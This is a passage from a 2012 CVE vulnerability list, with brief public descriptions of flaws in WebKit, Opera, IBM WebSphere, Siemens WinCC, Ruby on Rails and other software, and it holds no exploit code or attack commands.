listed in APPLE-SA-2012-09-12-1. [CVE-2012-3621] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3620] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3618] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3617] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3616] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3615] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3614] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3613] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3612] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3611] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3610] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3609] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3608] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3607] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3606] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3605] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3604] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3603] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3602] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3601] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3600] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3599] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3598] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3597] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3596] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3595] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3594] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3593] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3592] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3591] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3590] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3589] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3568] Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via crafted WebGL content, as demonstrated by a codeflow.org WebGL demo. [CVE-2012-3563] Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via a web page that contains invalid character encodings. [CVE-2012-3562] Opera before 12.00 Beta allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page that is not properly handled during a reload, as demonstrated by a "multiple origin camera test" page. [CVE-2012-3560] Opera before 11.65 does not ensure that the address field corresponds to the displayed web page during blocked navigation, which makes it easier for remote attackers to conduct spoofing attacks by detecting and preventing attempts to load a different web page. [CVE-2012-3558] Opera before 11.65 does not ensure that the address field corresponds to the displayed web page during unusually timed changes to this field, which makes it easier for user-assisted remote attackers to conduct spoofing attacks via vectors involving navigation, reloads, and redirects. [CVE-2012-3557] Opera before 11.65 does not properly restrict the reading of JSON strings, which allows remote attackers to perform cross-domain loading of JSON resources and consequently obtain sensitive information via a crafted web site. [CVE-2012-3556] Opera before 11.65 does not properly restrict the opening of a pop-up window in response to the first click of a double-click action, which makes it easier for user-assisted remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary code via a crafted web site. [CVE-2012-3555] Opera before 11.65 does not ensure that keyboard sequences are associated with a visible window, which makes it easier for user-assisted remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary code via a crafted web site, related to a "hidden keyboard navigation" issue. [CVE-2012-3551] Cross-site scripting (XSS) vulnerability in crowbar_framework/app/views/support/index.html.haml in the Crowbar barclamp in Crowbar, possibly 1.4 and earlier, allows remote attackers to inject arbitrary web script or HTML via the file parameter to /utils. [CVE-2012-3540] Open redirect vulnerability in views/auth_forms.py in OpenStack Dashboard (Horizon) Essex (2012.1) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the next parameter to auth/login/. NOTE: this issue was originally assigned CVE-2012-3542 by mistake. [CVE-2012-3531] Cross-site scripting (XSS) vulnerability in the Install Tool in TYPO3 4.5.x before 4.5.19, 4.6.x before 4.6.12 and 4.7.x before 4.7.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3528] Multiple cross-site scripting (XSS) vulnerabilities in the backend in TYPO3 4.5.x before 4.5.19, 4.6.x before 4.6.12 and 4.7.x before 4.7.4 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3508] Cross-site scripting (XSS) vulnerability in program/lib/washtml.php in Roundcube Webmail 0.8.0 allows remote attackers to inject arbitrary web script or HTML by using "javascript:" in an href attribute in the body of an HTML-formatted email. [CVE-2012-3507] Cross-site scripting (XSS) vulnerability in program/steps/mail/func.inc in RoundCube Webmail before 0.8.0, when using the Larry skin, allows remote attackers to inject arbitrary web script or HTML via the email message subject. [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules. [CVE-2012-3476] Multiple cross-site scripting (XSS) vulnerabilities in (1) application/views/admin/layout.php and (2) themes/default/views/header.php in the Ushahidi Platform before 2.5 allow remote authenticated users to inject arbitrary web script or HTML via vectors related to a site name. [CVE-2012-3465] Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/sanitize_helper.rb in the strip_tags helper in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via malformed HTML markup. [CVE-2012-3464] Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might allow remote attackers to inject arbitrary web script or HTML via vectors involving a ' (quote) character. [CVE-2012-3463] Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_tag_helper.rb in Ruby on Rails 3.x before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via the prompt field to the select_tag helper. [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body. [CVE-2012-3448] Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors. [CVE-2012-3434] Multiple cross-site scripting (XSS) vulnerabilities in userperspan.php in the Count Per Day module before 3.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page, (2) datemin, or (3) datemax parameter. [CVE-2012-3423] The IcedTea-Web plugin before 1.2.1 does not properly handle NPVariant NPStrings without NUL terminators, which allows remote attackers to cause a denial of service (crash), obtain sensitive information from memory, or execute arbitrary code via a crafted Java applet. [CVE-2012-3422] The getFirstInTableInstance function in the IcedTea-Web plugin before 1.2.1 returns an uninitialized pointer when the instance_to_id_map hash is empty, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted web page, which causes an uninitialized memory location to be read. [CVE-2012-3413] The HTMLQuoteColorer::process function in messageviewer/htmlquotecolorer.cpp in KDE PIM 4.6 through 4.8 does not disable JavaScript, Java, and Plugins, which allows remote attackers to inject arbitrary web script or HTML via a crafted email. [CVE-2012-3411] Dnsmasq before 2.63test1, when used with certain libvirt configurations, replies to requests from prohibited interfaces, which allows remote attackers to cause a denial of service (traffic amplification) via a spoofed DNS query. [CVE-2012-3396] Cross-site scripting (XSS) vulnerability in cohort/edit_form.php in Moodle 2.0.x before 2.0.10, 2.1.x before 2.1.7, 2.2.x before 2.2.4, and 2.3.x before 2.3.1 allows remote authenticated administrators to inject arbitrary web script or HTML via the idnumber field. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-2365. [CVE-2012-3393] Cross-site scripting (XSS) vulnerability in repository/lib.php in Moodle 2.1.x before 2.1.7 and 2.2.x before 2.2.4 allows remote authenticated administrators to inject arbitrary web script or HTML by renaming a repository. [CVE-2012-3389] Multiple cross-site scripting (XSS) vulnerabilities in mod/lti/typessettings.php in Moodle 2.2.x before 2.2.4 and 2.3.x before 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) lti_typename or (2) lti_toolurl parameter. [CVE-2012-3382] Cross-site scripting (XSS) vulnerability in the ProcessRequest function in mcs/class/System.Web/System.Web/HttpForbiddenHandler.cs in Mono 2.10.8 and earlier allows remote attackers to inject arbitrary web script or HTML via a file with a crafted name and a forbidden extension, which is not properly handled in an error message. [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app. [CVE-2012-3370] The SecurityAssociation.getCredential method in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 returns the credentials of the previous user when a security context is not provided, which allows remote attackers to gain privileges as other users. [CVE-2012-3369] The CallerIdentityLoginModule in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 allows remote attackers to gain privileges of the previous user via a null password, which causes the previous user's password to be used. [CVE-2012-3364] Multiple stack-based buffer overflows in the Near Field Communication Controller Interface (NCI) in the Linux kernel before 3.4.5 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via incoming frames with crafted length fields. [CVE-2012-3350] SQL injection vulnerability in index.php in Webmatic 3.1.1 allows remote attackers to execute arbitrary SQL commands via the Referer HTTP header. [CVE-2012-3343] Cross-site request forgery (CSRF) vulnerability in Microdasys before 3.5.1-B708, as used in Bloxx Web Filtering before 5.0.14 and other products, allows remote attackers to hijack the authentication of arbitrary users for requests that trigger error pages containing XSS sequences, a different vulnerability than CVE-2012-2564. [CVE-2012-3330] The proxy server in IBM WebSphere Application Server 7.0 before 7.0.0.27, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1, and WebSphere Virtual Enterprise, allows remote attackers to cause a denial of service (daemon outage) via a crafted request. [CVE-2012-3328] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.1, Maximo Asset Management Essentials 7.1, Tivoli Asset Management for IT 7.1 and 7.2, Tivoli Service Request Manager 7.1 and 7.2, and Change and Configuration Management Database (CCMDB) 7.1 and 7.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to a hidden frame footer. [CVE-2012-3327] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to a login action. [CVE-2012-3326] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3325] IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.5, and 8.5.x Full Profile before 8.5.0.1, when the PM44303 fix is installed, does not properly validate credentials, which allows remote authenticated users to obtain administrative access via unspecified vectors. [CVE-2012-3322] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via vectors related to a display name. [CVE-2012-3319] IBM Rational Business Developer 8.x before 8.0.1.4 allows remote attackers to obtain potentially sensitive information via a connection to a web service created with the Rational Business Developer product. [CVE-2012-3317] IBM WebSphere Message Broker 6.1 before 6.1.0.11, 7.0 before 7.0.0.5, and 8.0 before 8.0.0.2 has incorrect ownership of certain uninstaller Java Runtime Environment (JRE) files, which might allow local users to gain privileges by leveraging access to uid 501 or gid 300. [CVE-2012-3316] Cross-site scripting (XSS) vulnerability in the Tivoli Process Automation Engine (TPAE) in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3315] The Java servlets in the management console in IBM Tivoli Federated Identity Manager (TFIM) through 6.2.2 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) before 6.2.2 do not require authentication for all resource downloads, which allows remote attackers to bypass intended J2EE security constraints, and obtain sensitive information related to (1) federation metadata or (2) a web plugin configuration template, via a crafted request. [CVE-2012-3313] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3311] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 on z/OS, in certain configurations involving Federated Repositories for IIOP connections and Optimized Local Adapters, does not perform CBIND checks, which allows local users to bypass intended access restrictions, and read or modify application data, via unspecified vectors. [CVE-2012-3308] Cross-site scripting (XSS) vulnerability in IBM Sametime 8.0.2 through 8.5.2.1 allows remote attackers to inject arbitrary web script or HTML via an IM chat. [CVE-2012-3306] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1, when multi-domain support is configured, does not purge password data from the authentication cache, which has unspecified impact and remote attack vectors. [CVE-2012-3305] Directory traversal vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to overwrite arbitrary files via a crafted application file. [CVE-2012-3304] The Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to hijack sessions via unspecified vectors. [CVE-2012-3302] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Domino 7.x and 8.x before 8.5.4 allow remote attackers to inject arbitrary web script or HTML via (1) a URL accessed during use of the Mail template in the WebMail UI or (2) a URL accessed during use of Domino Help through the Domino HTTP server. [CVE-2012-3300] IBM WebSphere Commerce 7.0 before 7.0.0.6, when persistent sessions and personalization IDs are enabled, allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors. [CVE-2012-3298] Unspecified vulnerability in the REST services framework in IBM WebSphere Commerce 7.0 Feature Pack 4 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unspecified vectors. [CVE-2012-3297] Cross-site scripting (XSS) vulnerability in the embedded HTTP server in the Service Console in IBM Tivoli Monitoring 6.2.2 before 6.2.2-TIV-ITM-FP0009 and 6.3.2 before 6.2.3-TIV-ITM-FP0001 allows remote attackers to inject arbitrary web script or HTML via a crafted URI. [CVE-2012-3296] Cross-site scripting (XSS) vulnerability in the Help link in the login panel in IBM Power Hardware Management Console (HMC) 7R7.1.0 before SP4, 7R7.2.0 before SP2, and 7R7.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3295] IBM WebSphere MQ 7.1, when an SVRCONN channel is used, allows remote attackers to bypass the security-configuration setup step and obtain queue-manager access via unspecified vectors. [CVE-2012-3294] Multiple cross-site request forgery (CSRF) vulnerabilities in the Web Gateway component in IBM WebSphere MQ File Transfer Edition 7.0.4 and earlier, and WebSphere MQ - Managed File Transfer 7.5, allow remote attackers to hijack the authentication of arbitrary users for requests that (1) add user accounts via the /wmqfteconsole/Filespaces URI, (2) modify permissions via the /wmqfteconsole/FileSpacePermisssions URI, or (3) add MQ Message Descriptor (MQMD) user accounts via the /wmqfteconsole/UploadUsers URI. [CVE-2012-3293] Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.4, and 8.5.x before 8.5.0.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving FRAME elements, related to a cross-frame scripting (XFS) issue. [CVE-2012-3279] Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node Manager i (NNMi) 8.x, 9.0x, 9.1x, and 9.20 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3272] Cross-site scripting (XSS) vulnerability on the HP Color LaserJet CM3530 with firmware before 53.190.9, Color LaserJet CM60xx with firmware before 52.210.9, Color LaserJet CP3525 with firmware before 06.140.3 18, Color LaserJet CP4xxx with firmware before 07.120.6, Color LaserJet CP6015 with firmware before 04.160.3, LaserJet P3015 with firmware before 07.140.3, and LaserJet P4xxx with firmware before 04.170.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3257] HP Business Availability Center (BAC) 8.07 allows remote authenticated users to hijack web sessions via unspecified vectors. [CVE-2012-3255] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 8.07 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3251] Cross-site scripting (XSS) vulnerability in HP Service Manager Web Tier 7.11, 9.21, and 9.30, and HP Service Center Web Tier 6.28, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3238] Cross-site scripting (XSS) vulnerability in the Backup/Restore component in WebAdmin in Astaro Security Gateway before 8.305 allows remote attackers to inject arbitrary web script or HTML via the "Comment (optional)" field. [CVE-2012-3233] Cross-site scripting (XSS) vulnerability in __swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php in Kayako Fusion 4.40.1148, and possibly before 4.50.1581, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2012-3232] Cross-site scripting (XSS) vulnerability in search.php in web@all 2.0, as downloaded before May 30, 2012, allows remote attackers to inject arbitrary web script or HTML via the _text[title] parameter. [CVE-2012-3231] Multiple cross-site request forgery (CSRF) vulnerabilities in web@all 2.0, as downloaded before May 30, 2012, allow remote attackers to hijack the authentication of administrators for requests that add, delete, or modify sensitive information, as demonstrated by adding a file to execute arbitrary code via a do_addfile action to inc/browser/action.php. [CVE-2012-3186] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI. [CVE-2012-3185] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI. [CVE-2012-3184] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote attackers to affect integrity via unknown vectors related to Advanced UI. [CVE-2012-3183] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI. [CVE-2012-3161] Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1.1 allows remote attackers to affect integrity via unknown vectors related to Web Client (CS). [CVE-2012-3105] The glBufferData function in the WebGL implementation in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 does not properly mitigate an unspecified flaw in an NVIDIA driver, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a related issue to CVE-2011-3101. [CVE-2012-3057] Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted size field in audio data within a WRF file, aka Bug ID CSCtz00755. [CVE-2012-3056] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted WRF file, aka Bug ID CSCtz72946. [CVE-2012-3055] Stack-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted DHT chunk in a JPEG image within a WRF file, aka Bug ID CSCtz72953. [CVE-2012-3054] Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72977. [CVE-2012-3053] Buffer overflow in the Cisco WebEx Advanced Recording Format (ARF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted ARF file, aka Bug ID CSCtz72985. [CVE-2012-3040] Cross-site scripting (XSS) vulnerability in the web server on Siemens SIMATIC S7-1200 PLCs 2.x through 3.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted URI. [CVE-2012-3037] The Siemens SIMATIC S7-1200 2.x PLC does not properly protect the private key of the SIMATIC CONTROLLER Certification Authority certificate, which allows remote attackers to spoof the S7-1200 web server by using this key to create a forged certificate. [CVE-2012-3034] WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allows remote attackers to discover a username and password via crafted parameters to unspecified methods in ActiveX controls. [CVE-2012-3032] SQL injection vulnerability in WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allows remote attackers to execute arbitrary SQL commands via a crafted SOAP message. [CVE-2012-3031] Multiple cross-site scripting (XSS) vulnerabilities in WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allow remote attackers to inject arbitrary web script or HTML via a (1) GET parameter, (2) POST parameter, or (3) Referer HTTP header. [CVE-2012-3030] WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, stores sensitive information under the web root with insufficient access control, which allows remote attackers to read a (1) log file or (2) configuration file via a direct request. [CVE-2012-3028] Cross-site request forgery (CSRF) vulnerability in WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allows remote attackers to hijack the authentication of arbitrary users for requests that modify data or cause a denial of service. [CVE-2012-3026] rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6 through 3.5 SP1 allows remote attackers to cause a denial of service (memory corruption and service crash) or possibly execute arbitrary code via long input data, a different vulnerability than CVE-2012-3010 and CVE-2012-3021. [CVE-2012-3022] The SaveToFile method in a certain ActiveX control in TrendDisplay.dll in Canary Labs TrendLink 9.0.2.27051 and earlier does not properly restrict the creation of files, which allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via a crafted web site. [CVE-2012-3021] rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6 through 3.5 SP1 allows remote attackers to cause a denial of service (memory corruption and service crash) or possibly execute arbitrary code via long input data, a different vulnerability than CVE-2012-3010 and CVE-2012-3026. [CVE-2012-3020] The Siemens Synco 